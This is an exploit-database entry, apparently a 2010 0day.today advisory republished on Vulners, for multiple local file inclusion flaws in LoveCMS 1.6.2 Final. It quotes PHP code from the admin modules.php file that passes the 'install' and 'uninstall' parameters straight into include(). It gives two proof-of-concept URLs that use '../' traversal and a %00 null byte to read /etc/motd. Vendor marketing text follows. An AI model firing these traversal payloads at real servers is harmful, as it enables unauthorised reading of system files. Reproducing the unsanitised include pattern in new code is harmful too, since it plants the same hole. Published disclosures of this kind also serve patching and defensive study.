Lucene search
K

LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities

🗓️ 26 Dec 2010 00:00:00Reported by cOndemnedType 
zdt
 zdt
🔗 0day.today👁 11 Views

LoveCMS 1.6.2 Final Local File Inclusion Vulnerabilitie

Code
LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities
found by cOndemned
vendor: http://lovecms.org/
download: http://sourceforge.net/project/showfiles.php?group_id=168535
 
source of /system/admin/modules.php
 
    13. if(isset($_GET['install']))
    14. {
    15.     $include = $_GET['install'];
    16.    
    17.     include(LOVE_ROOT . '/modules/' . $include . '/info.php');
 
    [...]
 
    61. if(isset($_GET['uninstall']))
    62. {
    63.     $include = $_GET['uninstall'];
    64.    
    65.     include(LOVE_ROOT . '/modules/' . $include . '/info.php');
 
 
proof of concept
 
    http://[host]/[lovecms]/system/admin/modules.php?install=../../../../../etc/motd%00
    http://[host]/[lovecms]/system/admin/modules.php?uninstall=../../../../../etc/motd%00



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation